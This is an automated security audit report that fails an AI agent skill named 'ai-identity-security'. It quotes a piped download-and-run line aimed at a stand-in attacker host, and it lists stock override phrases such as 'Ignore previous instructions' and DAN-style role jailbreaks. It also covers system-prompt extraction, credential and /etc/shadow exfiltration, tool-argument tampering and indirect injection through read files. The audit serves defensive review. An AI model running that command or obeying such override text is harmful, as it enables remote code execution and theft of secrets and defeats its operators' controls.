ai-identity-security
Fail
Audited by Gen Agent Trust Hub on May 4, 2026
Risk Level: HIGHPROMPT_INJECTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The file
references/identity-attack-techniques.mdcontains a specific payload example using a piped shell execution pattern:curl https://attacker.com/setup.sh | bash. - [PROMPT_INJECTION]: The skill documentation provides functional payloads for bypassing agent constraints and overriding system behavior, including:
- Explicit 'Ignore previous instructions' and 'Forget role' commands in Section 1.3 of the references file.
- Role-play injections such as 'ADMIN-GPT' and 'UnrestrictedGPT' (DAN-style) meant to bypass application-level role restrictions.
- Instructions designed to extract the agent's system prompt or internal configuration.
- [DATA_EXFILTRATION]: The skill describes methods to induce an agent to reveal sensitive session tokens, API keys, and environment variables. It also includes examples targeting system files such as
/etc/shadow. - [COMMAND_EXECUTION]: The methodology includes 'Action Parameter Tampering' techniques where the user is instructed to manipulate tool call arguments (e.g., changing
querytoadmin_query) to achieve unauthorized command execution. - [DATA_EXFILTRATION]: Section 2.2 of the references file describes 'Toolchain Hijacking,' an indirect prompt injection surface where the agent is instructed to read external files (e.g.,
/tmp/task.txt) that may contain malicious instructions.
Recommendations
- AI detected serious security threats
Audit Metadata